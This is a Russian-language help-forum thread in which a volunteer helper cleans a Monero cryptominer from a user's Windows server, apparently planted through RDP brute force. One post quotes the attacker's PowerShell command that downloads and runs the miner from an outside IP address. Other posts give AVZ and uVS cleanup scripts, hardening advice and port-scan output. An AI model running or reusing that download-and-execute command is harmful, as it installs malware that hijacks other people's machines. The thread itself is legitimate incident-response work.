Торможение системы [VHO:Trojan.Win32.Miner.gen]

**W1nd** · 28.02.2021, 22:19

Здравствуйте. Очень плохо работает система. Почти каждая программа работает с торможением.
В диспетчере задач процесс COM Surrogate грузит процессор на 95%.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 28.02.2021, 22:21

Уважаемый(ая) W1nd, спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

**Vvvyg** · 01.03.2021, 07:44

Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:

Код:

begin
 TerminateProcessByName('c:\windows\temp\log.txt.exe');
 QuarantineFile('C:\Windows\system32\network.exe', '');
 QuarantineFile('c:\windows\temp\log.txt.exe', '');
 DeleteFile('c:\windows\temp\log.txt.exe', '');
 DeleteFile('c:\windows\temp\log.txt.exe', '64');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
end.

Пожалуйста, перезагрузите сервер вручную.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

**W1nd** · 01.03.2021, 13:33

Здравствуйте, карантин выслал, лог прикрепляю.

**Vvvyg** · 01.03.2021, 19:13

Майнер работает, но в автозагрузке его нет, запускается, похоже, вручную:

Код:

cmd.exe /C powershell.exe -C (New-Object System.Net.WebClient).DownloadFile('http://125.212.214.148:666/wao.exe','C:\windows\teMp\System.exe');(New-Object Net.WebClient).DownloadFile('http://125.212.214.148:666/WinRing0x64.sys', 'C:\Windows\temp\WinRing0x64.sys') && C:\Windows\temp\System.exe --donate-level 1 -o europe.randomx-hub.miningpoolhub.com:20580 -u hiddensec070.ww -a rx/0 --coin monero -B -l C:\ProgramData\log.txt && del C:\Windows\temp\System.exe

Запускается от системы, удалять его можно, но проблему это не решит.

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):

Код:

;uVS v4.11.3 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
; C:\WINDOWS\TEMP\SYSTEM.EXE
rbl 569FCF95F3889CEFD87C1B425FA37B03
dirzooex %SystemRoot%\TEMP
zoo %SystemRoot%\TEMP\SYSTEM.EXE
addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7

chklst
delvir

deltmp
czoo

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Скорее всего, взломали по RDP.

Смените всем пользователям, у кого есть права входа по RDP, пароли, установите сложные.
Уберитеправа администратора у всех пользователей, кому они действительно не необходимы, при грамотной настройке прав всем они не нужны.
Учёткам Администратор/Administrator/Admin запретить удалённый доступ, для администрирования через терминал пользуйтесь другими, с
нетипичным, лучше не словарным (типа rdp1) именем и сложными паролями.
Включить защиту от буртфорса (подбора) паролей. Простейший вариант - через политики, блокировать учётку на N минут после 3-4 неудачных попыток входа. Есть более продвинутые варианты с использованием стороннего софта, например: Инструкция по защите RDP подключения, или возможностей маршрутизатора, для Mikrotik, в частности, есть множество изощрённых рецептов.

И зачем открыты множество портов наружу, включая 53-й, у вас сервер DNS на весь интернет раздаёт? ЗаDDOSят.

Эти так вообще только для хитрого взлома пригодятся:

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-01 11:30:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC

**W1nd** · 03.03.2021, 17:59

Добрый день. Карантин выслал, лог прикрепляю.
Данную проблему решит только переустановка системы?

**Vvvyg** · 03.03.2021, 20:45

Вы меня либо не поняли, либо не читали рекомендации вообще. Переустановите систему, не не приняв мер против взлома - получите майнер снова через какое-то время.

Выполните скрипт в UVS:

Код:

;uVS v4.11.4 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
dirzooex %SystemRoot%\TEMP
adddir zoo %SystemRoot%\TEMP
zoo %SystemRoot%\TEMP\SYSTEM.EXE
addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7

chklst
delvir

regt 27
czoo

cexec wevtutil.exe epl System system.evtx
cexec wevtutil.exe epl Application Application.evtx
cexec wevtutil.exe epl Security Security.evtx
cexec pack\7za.exe a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=64m Events.7z *.evtx
apply

В папке с uVS появится новый архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

В папке с UVS появится архив Events.7z, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.

**W1nd** · 06.03.2021, 13:37

Добрый день.
Ссылка на файл https://my-files.su/ib64on
Карантин выслал и лог прикрепляю

**Vvvyg** · 08.03.2021, 21:42

Пока всё по-прежнему, брутфориить по RDP можно до посинения. Смена порта ничего не даёт.
Настройте блокировку через болитики, или IPBan.

Скачайте по той же ссылке обновлённую версию UVS и сделайте новый полный образ автозапуска.

**W1nd** · 15.03.2021, 21:03

Здравствуйте, ссылка на лог https://my-files.su/dn5cim

**Vvvyg** · 15.03.2021, 21:52

Майнера нет.

Но RDP всё так же подвержен брутфорсу. IPBan отсутствует, насколько вижу.
Кстати в той инструкции ссылка на устаревшую версию и x86. Ставьте свежую x64 версию.

**W1nd** · 15.03.2021, 23:26

Свежую версию ipban поставил, все сделал согласно инструкции.

**Vvvyg** · 16.03.2021, 20:28

Теперь банит.

Только один вопрос остался: зачем всё это торчит наружу?

53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-16 17:15:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49910/tcp open msrpc Microsoft Windows RPC

**CyberHelper** · 16.03.2021, 20:38

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:

=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 3
=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 8
=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
1. c:\windows\system32\network.exe - VHO:Trojan.Win32.Miner.gen=
2. c:\windows\temp\log.txt.exe - VHO:Trojan.Win32.Miner.gen=
3. \system.exe._74948333fd5cced7e04dc67e68096b6437160 2a9 - VHO:Tr=
  ojan.Win32.Miner.gen

Торможение системы [VHO:Trojan.Win32.Miner.gen] (заявка № 226454)

Опции темы